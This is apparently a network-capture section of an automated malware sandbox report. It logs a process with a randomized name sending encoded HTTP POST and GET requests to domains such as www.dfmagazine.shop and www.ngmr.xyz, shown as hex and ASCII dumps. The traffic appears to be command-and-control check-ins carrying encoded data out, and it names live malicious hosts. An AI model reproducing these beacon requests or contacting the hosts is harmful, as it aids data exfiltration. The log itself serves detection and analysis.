                                                                                  15192.168.11.204977184.32.84.32803276C:\Program Files (x86)\dhRiHTExjJnJkSBdQurHdqlFzJxpfDDcASxxhCLbjCbKzyvQYVLHt\giLTwJlyLWpfb.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Sep 25, 2024 09:55:57.269597054 CEST839OUTPOST /7k8f/ HTTP/1.1
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  Host: www.dfmagazine.shop
                                                                                  Origin: http://www.dfmagazine.shop
                                                                                  Referer: http://www.dfmagazine.shop/7k8f/
                                                                                  Content-Length: 222
                                                                                  Cache-Control: max-age=0
                                                                                  Connection: close
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; BLASTER Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
                                                                                  Data Raw: 58 62 33 78 49 3d 34 7a 31 57 55 39 52 71 59 6a 61 64 4e 4a 2b 50 50 43 48 4e 71 53 58 6d 70 54 39 37 4b 2b 33 71 5a 4d 2b 45 35 75 54 44 41 64 49 41 77 6f 44 2f 63 68 6d 35 30 76 39 39 4a 6f 7a 76 42 70 47 2f 2b 77 65 74 61 6d 57 4a 41 69 4a 2f 70 6d 54 43 35 44 34 6f 42 53 44 67 50 31 41 30 70 76 73 69 36 58 6f 74 42 6e 64 32 65 34 4c 31 6f 54 63 31 75 77 70 48 5a 6e 4a 62 4d 4a 77 79 44 30 4b 72 44 33 45 4e 70 73 55 6b 62 76 34 56 79 58 49 4b 35 62 7a 4f 49 68 56 36 45 61 56 35 54 51 79 4b 34 4d 32 4d 6b 39 4b 44 2f 6c 4b 4d 73 6d 6c 50 41 61 4d 59 50 53 66 32 62 4d 6f 52 4e 4b 66 53 4d 36 58 76 33 7a 54 50 36 4c 58 79 77 53 67 61 74 32 4d 54 37 70 67 3d
                                                                                  Data Ascii: Xb3xI=4z1WU9RqYjadNJ+PPCHNqSXmpT97K+3qZM+E5uTDAdIAwoD/chm50v99JozvBpG/+wetamWJAiJ/pmTC5D4oBSDgP1A0pvsi6XotBnd2e4L1oTc1uwpHZnJbMJwyD0KrD3ENpsUkbv4VyXIK5bzOIhV6EaV5TQyK4M2Mk9KD/lKMsmlPAaMYPSf2bMoRNKfSM6Xv3zTP6LXywSgat2MT7pg=


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  16192.168.11.204977284.32.84.32803276C:\Program Files (x86)\dhRiHTExjJnJkSBdQurHdqlFzJxpfDDcASxxhCLbjCbKzyvQYVLHt\giLTwJlyLWpfb.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Sep 25, 2024 09:56:00.035566092 CEST1289OUTPOST /7k8f/ HTTP/1.1
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  Host: www.dfmagazine.shop
                                                                                  Origin: http://www.dfmagazine.shop
                                                                                  Referer: http://www.dfmagazine.shop/7k8f/
                                                                                  Content-Length: 7370
                                                                                  Cache-Control: max-age=0
                                                                                  Connection: close
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; BLASTER Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
                                                                                  Data Raw: 58 62 33 78 49 3d 34 7a 31 57 55 39 52 71 59 6a 61 64 4e 4a 2b 50 50 43 48 4e 71 53 58 6d 70 54 39 37 4b 2b 33 71 5a 4d 2b 45 35 75 54 44 41 64 41 41 77 62 4c 2f 64 47 61 35 33 76 39 39 4b 6f 7a 79 42 70 47 69 2b 32 32 70 61 6d 62 2b 41 67 78 2f 6d 6c 4c 43 2b 77 67 6f 50 53 44 67 58 31 41 33 6d 50 73 33 36 54 30 68 42 6d 74 32 65 34 4c 31 6f 51 45 31 74 68 70 48 56 48 4a 55 47 70 77 2b 55 45 4b 50 44 33 4d 33 70 73 51 61 63 62 30 56 79 33 59 4b 30 50 54 4f 45 68 56 38 48 61 56 78 54 51 4f 56 34 49 66 31 6b 39 50 59 2f 6a 75 4d 74 78 67 70 5a 49 4a 50 64 41 6e 47 52 63 55 51 45 34 57 43 44 72 44 57 78 41 33 5a 7a 2b 66 45 38 53 63 4d 39 33 63 34 35 75 75 6e 61 61 5a 66 45 4e 64 75 77 68 2b 67 69 7a 72 53 4d 4e 2b 4a 4c 6c 67 32 42 38 6b 6b 6d 2f 58 2b 63 76 75 4e 76 6c 63 64 59 4f 52 4b 54 54 6e 4d 47 6d 4a 62 34 57 69 79 38 35 57 49 4c 30 66 43 54 42 42 30 33 44 46 78 32 74 6a 38 65 52 6b 51 51 43 77 56 73 68 2f 63 34 37 4e 51 78 5a 78 53 71 51 4c 48 78 51 51 47 58 38 55 35 51 79 71 4a 47 48 54 2b [TRUNCATED]
                                                                                  Data Ascii: Xb3xI=4z1WU9RqYjadNJ+PPCHNqSXmpT97K+3qZM+E5uTDAdAAwbL/dGa53v99KozyBpGi+22pamb+Agx/mlLC+wgoPSDgX1A3mPs36T0hBmt2e4L1oQE1thpHVHJUGpw+UEKPD3M3psQacb0Vy3YK0PTOEhV8HaVxTQOV4If1k9PY/juMtxgpZIJPdAnGRcUQE4WCDrDWxA3Zz+fE8ScM93c45uunaaZfENduwh+gizrSMN+JLlg2B8kkm/X+cvuNvlcdYORKTTnMGmJb4Wiy85WIL0fCTBB03DFx2tj8eRkQQCwVsh/c47NQxZxSqQLHxQQGX8U5QyqJGHT+d/1dPE3YcYiFDAHq0DcYLr9xKKlqrotLKHPtKM3cUJDPz8N9d7wzaNc356vNlW8JILLWvNYqTBj3RV+gFZiJyqngSgDpxaog+vgA6KG/lbnEMIrHbpK0uNnpVteKyfA9Zmyr5a3BKvP43ZifrqUi31IXdPfLvVridjP6/pZnYlEcMr0lLxjkYsahQFuUgzz+39UA/+6f2MblZHYFBmUPiZPImuLVet19ORlRz9XgwkrY4TIhqOEzmXe+fGqPJTUfycYt6a+TpndN3VJcdJUEtR+T+kP0RDwru2HPFUWXzmgo3RuaLhVM3gvg/2Y+uwf8FOQDiMz7+GNAH
                                                                                  Sep 25, 2024 09:56:00.035625935 CEST6699OUTData Raw: 2b 66 75 4f 36 6e 4f 53 44 4b 55 2f 61 77 6a 62 49 55 57 5a 46 31 47 46 53 70 6d 39 52 75 5a 30 32 38 62 43 39 30 32 68 71 53 6f 6d 57 6f 75 4e 4a 43 4b 59 68 31 4c 6b 35 79 6e 38 68 4e 32 73 69 78 39 62 62 6f 66 73 79 63 58 66 43 4b 61 35 76 43
                                                                                  Data Ascii: +fuO6nOSDKU/awjbIUWZF1GFSpm9RuZ028bC902hqSomWouNJCKYh1Lk5yn8hN2six9bbofsycXfCKa5vCjADBdyXl1AVFwlVusfCsZov6jJ9isUf5WlrbayYUQ/VCINmeIHKZfccDvxclR8pSQzO3eO7q71Ob0M6iY5ZTixCWYfuznMRNtcttdbHfnc21pOvTAQgUbhIMvFp3D1w6Fx8KH+OdTusBicK4RT326in5gRywGs6gz


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  17192.168.11.204977384.32.84.32803276C:\Program Files (x86)\dhRiHTExjJnJkSBdQurHdqlFzJxpfDDcASxxhCLbjCbKzyvQYVLHt\giLTwJlyLWpfb.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Sep 25, 2024 09:56:02.794814110 CEST549OUTGET /7k8f/?O4bP=9dRH6ZfHbJX&Xb3xI=1xd2XIdTc2qaFZ+FWSTYli7OxzQOBufybu6t7KDIboRfwcHmUmPthK5WfpWTXJmR/FSLDU2eJw9bxVvh/BR2RAGhDgY7k/sU7CIWPHYqUL7qqxcngXtaZyk= HTTP/1.1
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  Host: www.dfmagazine.shop
                                                                                  Connection: close
                                                                                  User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; BLASTER Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
                                                                                  Sep 25, 2024 09:56:03.019337893 CEST1289INHTTP/1.1 200 OK
                                                                                  Server: hcdn
                                                                                  Date: Wed, 25 Sep 2024 07:56:02 GMT
                                                                                  Content-Type: text/html
                                                                                  Content-Length: 10072
                                                                                  Connection: close
                                                                                  Vary: Accept-Encoding
                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                  x-hcdn-request-id: e4f3ce1ee073c64d008ff5ae72566668-asc-edge3
                                                                                  Expires: Wed, 25 Sep 2024 07:56:01 GMT
                                                                                  Cache-Control: no-cache
                                                                                  Accept-Ranges: bytes
                                                                                  Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 74 69 74 6c 65 3e 50 61 72 6b 65 64 20 44 6f 6d 61 69 6e 20 6e 61 6d 65 20 6f 6e 20 48 6f 73 74 69 6e 67 65 72 20 44 4e 53 20 73 79 73 74 65 6d 3c 2f 74 69 74 6c 65 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 2c 63 68 72 6f 6d 65 3d 31 22 20 68 74 74 70 2d 65 71 75 69 76 3d 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 3e 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 50 61 72 6b 65 64 20 44 6f 6d 61 69 6e 20 6e 61 6d 65 20 6f 6e 20 48 6f 73 74 69 6e 67 65 72 20 44 4e 53 20 73 79 73 74 65 6d 22 20 6e 61 6d 65 3d 64 65 73 63 72 69 70 74 69 6f 6e 3e 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 3e 3c 6c 69 6e 6b 20 68 72 65 66 3d 68 74 74 70 73 3a 2f 2f 6d 61 78 63 64 6e 2e 62 6f 6f 74 73 74 72 61 70 63 64 6e 2e 63 6f 6d 2f 62 6f [TRUNCATED]
                                                                                  Data Ascii: <!doctype html><title>Parked Domain name on Hostinger DNS system</title><meta charset=utf-8><meta content="IE=edge,chrome=1" http-equiv=X-UA-Compatible><meta content="Parked Domain name on Hostinger DNS system" name=description><meta content="width=device-width,initial-scale=1" name=viewport><link href=https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/css/bootstrap.min.css rel=stylesheet><script src=https://ajax.googleapis.com/ajax/libs/jquery/3.2.1/jquery.min.js></script><script src=https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/js/bootstrap.min.js></script><link href=https://cdnjs.cloudflare.com/ajax/libs/font-awesome/5.15.3/css/all.min.css rel=stylesheet><link href="https://fonts.googleapis.com/css?family=Open+Sans:300,300i,400,400i,600,600i,700,700i,800,800i&subset=cyrillic,cyrillic-ext,greek,greek-ext,latin-ext,vietnamese" rel=stylesheet><style>html{height:100%}body{font-family:"Open Sans",Helvetica,sans-serif;color:#000;padding:0;
                                                                                  Sep 25, 2024 09:56:03.019610882 CEST1289INData Raw: 6d 61 72 67 69 6e 3a 30 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 2e 34 32 38 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 31 30 2e 37 64 65 67 2c 23 65 39 65 64 66 62 20 2d 35 30 2e 32 31 25 2c 23 66 36 66
                                                                                  Data Ascii: margin:0;line-height:1.428;background:linear-gradient(10.7deg,#e9edfb -50.21%,#f6f8fd 31.11%,#fff 166.02%)}h1,h2,h3,h4,h5,h6,p{padding:0;margin:0;color:#333}h1{font-size:30px;font-weight:600!important;color:#333}h2{font-size:24px;font-weight:6
                                                                                  Sep 25, 2024 09:56:03.019623041 CEST1289INData Raw: 33 65 61 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 6e 61 76 62 61 72 2d 6e 61 76 3e 6c 69 3e 61 20 69 7b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 35 70 78 7d 2e 6e 61 76 2d 62 61 72 20 69 6d 67 7b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 74
                                                                                  Data Ascii: 3ea!important}.navbar-nav>li>a i{margin-right:5px}.nav-bar img{position:relative;top:3px}.congratz{margin:0 auto;text-align:center}.top-container{display:flex;flex-direction:row}.message-subtitle{color:#2f1c6a;font-weight:700;font-size:24px;li
                                                                                  Sep 25, 2024 09:56:03.019638062 CEST1289INData Raw: 69 7a 65 3a 31 32 70 78 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 36 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 32 30 70 78 3b 6d 69 6e 2d 77 69 64 74 68 3a 32 30 70 78 3b 76 65 72 74 69 63 61 6c 2d 61 6c 69 67 6e 3a 6d 69 64 64 6c 65 3b 74 65 78
                                                                                  Data Ascii: ize:12px;line-height:16px;min-height:20px;min-width:20px;vertical-align:middle;text-align:center;display:inline-block;padding:4px 8px;font-weight:700;border-radius:4px;background-color:#fc5185}@media screen and (max-width:768px){.message{width
                                                                                  Sep 25, 2024 09:56:03.019697905 CEST1289INData Raw: 72 69 61 6c 73 20 72 65 6c 3d 6e 6f 66 6f 6c 6c 6f 77 3e 3c 69 20 61 72 69 61 2d 68 69 64 64 65 6e 3d 74 72 75 65 20 63 6c 61 73 73 3d 22 66 61 73 20 66 61 2d 67 72 61 64 75 61 74 69 6f 6e 2d 63 61 70 22 3e 3c 2f 69 3e 20 54 75 74 6f 72 69 61 6c
                                                                                  Data Ascii: rials rel=nofollow><i aria-hidden=true class="fas fa-graduation-cap"></i> Tutorials</a></li><li><a href=https://support.hostinger.com/en/ rel=nofollow><i aria-hidden=true class="fa-readme fab"></i>Knowledge base</a></li><li><a href=https://www
                                                                                  Sep 25, 2024 09:56:03.019712925 CEST1289INData Raw: 20 68 6f 73 74 69 6e 67 20 66 6f 72 20 79 6f 75 72 20 73 75 63 63 65 73 73 66 75 6c 20 6f 6e 6c 69 6e 65 20 70 72 6f 6a 65 63 74 73 2e 3c 2f 70 3e 3c 62 72 3e 3c 61 20 68 72 65 66 3d 68 74 74 70 73 3a 2f 2f 77 77 77 2e 68 6f 73 74 69 6e 67 65 72
                                                                                  Data Ascii: hosting for your successful online projects.</p><br><a href=https://www.hostinger.com rel=nofollow>Find your hosting plan</a></div></div><div class="col-xs-12 col-sm-4 column-custom-wrap"><div class=column-custom><div class=column-title>Add w
                                                                                  Sep 25, 2024 09:56:03.019725084 CEST1289INData Raw: 5b 5d 2c 6e 3d 30 2c 74 3d 6f 2e 6c 65 6e 67 74 68 3b 6e 3c 74 3b 29 7b 69 66 28 35 35 32 39 36 3d 3d 28 36 33 34 38 38 26 28 72 3d 6f 5b 6e 2b 2b 5d 29 29 29 74 68 72 6f 77 20 6e 65 77 20 52 61 6e 67 65 45 72 72 6f 72 28 22 55 54 46 2d 31 36 28
                                                                                  Data Ascii: [],n=0,t=o.length;n<t;){if(55296==(63488&(r=o[n++])))throw new RangeError("UTF-16(encode): Illegal UTF-16 value");65535<r&&(r-=65536,e.push(String.fromCharCode(r>>>10&1023|55296)),r=56320|1023&r),e.push(String.fromCharCode(r))}return e.join(""
                                                                                  Sep 25, 2024 09:56:03.019737005 CEST1289INData Raw: 69 63 65 28 66 2c 30 2c 61 29 2c 66 2b 2b 7d 69 66 28 74 29 66 6f 72 28 66 3d 30 2c 77 3d 6d 2e 6c 65 6e 67 74 68 3b 66 3c 77 3b 66 2b 2b 29 79 5b 66 5d 26 26 28 6d 5b 66 5d 3d 53 74 72 69 6e 67 2e 66 72 6f 6d 43 68 61 72 43 6f 64 65 28 6d 5b 66
                                                                                  Data Ascii: ice(f,0,a),f++}if(t)for(f=0,w=m.length;f<w;f++)y[f]&&(m[f]=String.fromCharCode(m[f]).toUpperCase().charCodeAt(0));return this.utf16.encode(m)},this.encode=function(t,a){var h,f,i,c,u,d,l,p,g,s,C,w;a&&(w=this.utf16.decode(t));var v=(t=this.utf1
                                                                                  Sep 25, 2024 09:56:03.019748926 CEST100INData Raw: 2c 61 63 63 6f 75 6e 74 3d 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 70 61 74 68 4e 61 6d 65 22 29 3b 61 63 63 6f 75 6e 74 2e 69 6e 6e 65 72 48 54 4d 4c 3d 70 75 6e 79 63 6f 64 65 2e 54 6f 55 6e 69 63 6f 64 65 28
                                                                                  Data Ascii: ,account=document.getElementById("pathName");account.innerHTML=punycode.ToUnicode(pathName)</script>


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  18192.168.11.204977454.67.87.110803276C:\Program Files (x86)\dhRiHTExjJnJkSBdQurHdqlFzJxpfDDcASxxhCLbjCbKzyvQYVLHt\giLTwJlyLWpfb.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Sep 25, 2024 09:56:08.468861103 CEST798OUTPOST /txr6/ HTTP/1.1
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  Host: www.ngmr.xyz
                                                                                  Origin: http://www.ngmr.xyz
                                                                                  Referer: http://www.ngmr.xyz/txr6/
                                                                                  Content-Length: 202
                                                                                  Cache-Control: max-age=0
                                                                                  Connection: close
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; BLASTER Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
                                                                                  Data Raw: 58 62 33 78 49 3d 71 52 6f 37 55 57 6c 47 45 32 70 55 6a 58 31 47 76 52 66 63 73 44 4a 6a 63 75 79 4f 6d 48 6b 49 44 72 39 54 42 42 2b 45 54 5a 30 2b 49 4e 42 64 78 2f 35 6d 61 52 62 66 6d 2f 54 74 7a 72 49 39 49 65 2f 56 4c 6b 42 52 41 58 6e 51 35 44 78 4b 6a 42 6e 42 32 54 67 2b 71 57 63 32 34 7a 6d 38 69 4b 42 71 55 58 5a 7a 42 51 4d 42 74 62 5a 36 66 56 38 63 32 34 75 51 30 6e 33 7a 66 61 75 4e 4a 68 70 39 7a 2f 45 6d 34 57 6d 77 37 6f 77 73 74 4e 77 79 51 78 74 45 4c 39 50 71 32 78 7a 35 56 73 34 2b 49 55 31 6e 71 34 48 34 34 2b 2b 79 2f 58 70 39 64 71 31 36 4b 5a 55 69 76 4e 72 55 70 51 3d 3d
                                                                                  Data Ascii: Xb3xI=qRo7UWlGE2pUjX1GvRfcsDJjcuyOmHkIDr9TBB+ETZ0+INBdx/5maRbfm/TtzrI9Ie/VLkBRAXnQ5DxKjBnB2Tg+qWc24zm8iKBqUXZzBQMBtbZ6fV8c24uQ0n3zfauNJhp9z/Em4Wmw7owstNwyQxtEL9Pq2xz5Vs4+IU1nq4H44++y/Xp9dq16KZUivNrUpQ==
                                                                                  Sep 25, 2024 09:56:08.638649940 CEST550INHTTP/1.1 404 Not Found
                                                                                  Content-Type: text/html; charset=iso-8859-1
                                                                                  Content-Length: 282
                                                                                  Accept-Ranges: bytes
                                                                                  Date: Wed, 25 Sep 2024 08:18:34 GMT
                                                                                  X-Varnish: 1105030324
                                                                                  Age: 0
                                                                                  Via: 1.1 varnish
                                                                                  Connection: close
                                                                                  X-Varnish-Cache: MISS
                                                                                  Server: C2M Server v1.02
                                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 78 72 36 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 37 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 6e 67 6d 72 2e 78 79 7a 20 50 6f 72 74 20 38 30 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                  Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /txr6/ was not found on this server.</p><hr><address>Apache/2.4.7 (Ubuntu) Server at www.ngmr.xyz Port 8080</address></body></html>


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  19192.168.11.204977554.67.87.110803276C:\Program Files (x86)\dhRiHTExjJnJkSBdQurHdqlFzJxpfDDcASxxhCLbjCbKzyvQYVLHt\giLTwJlyLWpfb.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Sep 25, 2024 09:56:11.179272890 CEST818OUTPOST /txr6/ HTTP/1.1
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  Host: www.ngmr.xyz
                                                                                  Origin: http://www.ngmr.xyz
                                                                                  Referer: http://www.ngmr.xyz/txr6/
                                                                                  Content-Length: 222
                                                                                  Cache-Control: max-age=0
                                                                                  Connection: close
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; BLASTER Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
                                                                                  Data Raw: 58 62 33 78 49 3d 71 52 6f 37 55 57 6c 47 45 32 70 55 6a 33 6c 47 73 79 33 63 6b 44 4a 67 41 2b 79 4f 73 6e 6b 4d 44 72 68 54 42 41 37 44 54 72 51 2b 49 74 78 64 77 36 5a 6d 5a 52 62 66 30 66 54 6f 33 72 49 36 49 65 7a 72 4c 68 68 52 41 55 62 51 35 42 70 4b 6a 57 7a 4f 6e 54 67 34 7a 6d 63 34 38 7a 6d 38 69 4b 42 71 55 58 39 5a 42 55 67 42 73 71 4a 36 4f 45 38 62 6f 6f 75 66 33 6e 33 7a 62 61 75 7a 4a 68 6f 65 7a 36 67 63 34 55 75 77 37 6f 67 73 74 63 77 78 61 78 74 43 50 39 4f 47 78 68 6d 75 4e 75 34 6a 59 6e 4a 33 74 72 2f 7a 30 49 76 6f 69 6c 64 5a 65 35 70 49 4f 70 74 4b 74 50 71 50 30 65 50 52 51 4f 55 49 34 57 77 46 6f 4d 43 75 35 47 54 78 4f 61 4d 3d
                                                                                  Data Ascii: Xb3xI=qRo7UWlGE2pUj3lGsy3ckDJgA+yOsnkMDrhTBA7DTrQ+Itxdw6ZmZRbf0fTo3rI6IezrLhhRAUbQ5BpKjWzOnTg4zmc48zm8iKBqUX9ZBUgBsqJ6OE8boouf3n3zbauzJhoez6gc4Uuw7ogstcwxaxtCP9OGxhmuNu4jYnJ3tr/z0IvoildZe5pIOptKtPqP0ePRQOUI4WwFoMCu5GTxOaM=
                                                                                  Sep 25, 2024 09:56:11.351583004 CEST550INHTTP/1.1 404 Not Found
                                                                                  Content-Type: text/html; charset=iso-8859-1
                                                                                  Content-Length: 282
                                                                                  Accept-Ranges: bytes
                                                                                  Date: Wed, 25 Sep 2024 08:18:36 GMT
                                                                                  X-Varnish: 1105030335
                                                                                  Age: 0
                                                                                  Via: 1.1 varnish
                                                                                  Connection: close
                                                                                  X-Varnish-Cache: MISS
                                                                                  Server: C2M Server v1.02
                                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 78 72 36 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 37 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 6e 67 6d 72 2e 78 79 7a 20 50 6f 72 74 20 38 30 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                  Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /txr6/ was not found on this server.</p><hr><address>Apache/2.4.7 (Ubuntu) Server at www.ngmr.xyz Port 8080</address></body></html>


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  20192.168.11.204977654.67.87.110803276C:\Program Files (x86)\dhRiHTExjJnJkSBdQurHdqlFzJxpfDDcASxxhCLbjCbKzyvQYVLHt\giLTwJlyLWpfb.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Sep 25, 2024 09:56:13.890320063 CEST1289OUTPOST /txr6/ HTTP/1.1
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  Host: www.ngmr.xyz
                                                                                  Origin: http://www.ngmr.xyz
                                                                                  Referer: http://www.ngmr.xyz/txr6/
                                                                                  Content-Length: 7370
                                                                                  Cache-Control: max-age=0
                                                                                  Connection: close
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; BLASTER Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
                                                                                  Data Raw: 58 62 33 78 49 3d 71 52 6f 37 55 57 6c 47 45 32 70 55 6a 33 6c 47 73 79 33 63 6b 44 4a 67 41 2b 79 4f 73 6e 6b 4d 44 72 68 54 42 41 37 44 54 72 59 2b 49 65 35 64 78 63 52 6d 59 52 62 66 76 66 54 70 33 72 4a 2f 49 65 72 76 4c 68 73 73 41 52 66 51 34 69 68 4b 32 53 66 4f 2b 44 67 34 75 57 63 35 34 7a 6d 54 69 4f 6c 75 55 58 74 5a 42 55 67 42 73 70 42 36 4f 56 38 62 71 6f 75 51 30 6e 33 76 66 61 76 65 4a 68 77 67 7a 37 68 72 37 6c 4f 77 37 4a 51 73 76 75 49 78 48 68 74 41 44 64 4f 65 78 68 37 70 4e 74 63 4a 59 6d 39 5a 74 6f 76 7a 6e 34 71 32 79 57 70 39 66 75 52 41 4f 62 39 33 6e 2f 69 7a 36 5a 2f 6f 57 73 34 67 77 78 30 76 75 75 57 67 6f 32 66 78 50 65 67 59 41 62 2f 44 6e 6c 79 70 62 78 79 6f 2b 62 51 6c 2b 38 76 51 71 2f 62 55 51 61 74 70 46 57 33 50 7a 49 53 50 46 67 73 63 45 6c 43 35 46 4e 43 4d 35 73 48 36 32 33 42 39 36 6c 76 42 36 46 32 4b 47 65 58 50 65 31 75 45 39 4b 34 74 35 79 4b 49 73 56 5a 4b 2f 73 56 61 76 6a 76 7a 59 74 30 77 69 33 6e 34 31 4f 72 41 36 6e 41 4b 2b 4e 70 2b 77 41 66 41 [TRUNCATED]
